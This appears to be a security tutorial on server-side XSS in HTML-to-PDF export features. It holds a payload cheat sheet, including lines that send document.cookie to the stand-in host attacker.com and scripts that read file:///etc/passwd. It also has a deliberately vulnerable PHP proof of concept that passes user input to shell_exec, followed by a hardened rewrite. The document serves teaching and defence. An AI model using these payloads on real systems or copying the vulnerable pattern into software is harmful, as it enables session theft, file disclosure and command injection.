
Server Side XSS (Dynamic generated PDF)

by Becoming a Hacker, 18 May 2022

Overview

Some pages take the content of a particular page, render it as HTML, and return the result as a PDF. If user input can be inserted into that page and is interpreted as HTML code, the vulnerability is both XSS and SSRF (Server Side Request Forgery), because the HTML is executed by a browser engine on the server. This kind of vulnerability is called Server Side XSS.

※ This does not occur only in PDF-export features, but since that is the most common case, the explanation below uses PDF as the reference.

Cheat Sheet

Confirm Server Side XSS Code

<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>


Confirm Server Side Blind XSS Code

<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">


Leaked Server URL

<img src="x" onerror="document.write(window.location)"/>
<script> document.write(window.location) </script>


LFI (Local File Inclusion) - when the server URL scheme is file://

<script>
var x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
<script>
var xhzeem = new XMLHttpRequest();
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
</script>
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

PoC (Proof of Concept)

Vulnerable code

<?php
require_once('/usr/share/php/tcpdf/examples/tcpdf_include.php');

// Renders temp.html to test.pdf with PhantomJS (a headless WebKit browser),
// so any HTML or JavaScript in temp.html is executed on the server.
function jsrender(){
        $script = __DIR__."/content.js";
        $cmd = "phantomjs content.js";
        $output = shell_exec($cmd);
        return $output;
}

if($_GET['html']){
        // User input is written into temp.html as-is, so it is rendered as markup.
        $cmd = $_GET['html'];
        shell_exec("echo '$cmd' > temp.html");
        $html = jsrender();
        header("Content-type: application/pdf");
        header("Content-Disposition: inline; filename=filename.pdf");
        @readfile('test.pdf');
}else{ $html = "<h3>Hello World</h3>";}
?>
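For contrast, here is a hardened version of the PoC above. It is an added example, not code from the post, and it assumes the same phantomjs/content.js layout (content.js reads temp.html and writes test.pdf); only the way user input reaches the renderer changes.

```php
<?php
// Added example (not the post's code): hardened rewrite of the PoC above.
// Assumption: content.js still reads temp.html and writes test.pdf.

// Same fixed command as the PoC; nothing user-controlled reaches the shell.
function jsrender() {
    return shell_exec('phantomjs content.js');
}

// Build the document the renderer will see. The user value is treated as
// text, so <script>, <img onerror=...> and <iframe src=file://...> from the
// cheat sheet are rendered as literal characters instead of being executed.
function build_document(string $userText): string {
    $safe = htmlspecialchars($userText, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<!DOCTYPE html><html><head><meta charset="utf-8"></head>'
         . '<body><h3>' . $safe . '</h3></body></html>';
}

$userText = $_GET['html'] ?? '';
if ($userText === '') {
    $userText = 'Hello World';
}

// Write the file directly instead of `echo '$cmd' > temp.html`, which also
// removes the command injection through a single quote in the parameter.
file_put_contents(__DIR__ . '/temp.html', build_document($userText));
jsrender();

$pdf = __DIR__ . '/test.pdf';
if (!is_file($pdf)) {
    http_response_code(500);
    exit('PDF rendering failed');
}
header('Content-Type: application/pdf');
header('Content-Disposition: inline; filename="filename.pdf"');
header('Content-Length: ' . filesize($pdf));
readfile($pdf);
```

Escaping removes the injection, but the LFI path in the cheat sheet (file:// access from the renderer) is a separate control: the renderer should run without access to the local filesystem or internal network.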

Confirm Server Side XSS Code : <h1>123</h1>


Leaked Server URL : <script>document.write(window.location.href);</script>


Access Denied Bypass : <iframe src="/wordpress/wp-admin/"></iframe>


Server Side XSS 1-day vulnerabilities


MicroStrategy SSRF through PDF Generator (CVE-2020-24815) | Triskele Labs

Extracting your AWS Access Keys through a PDF file. An innocuous “Export to PDF” function can be an open door to your organisation’s internal network

www.triskelelabs.com
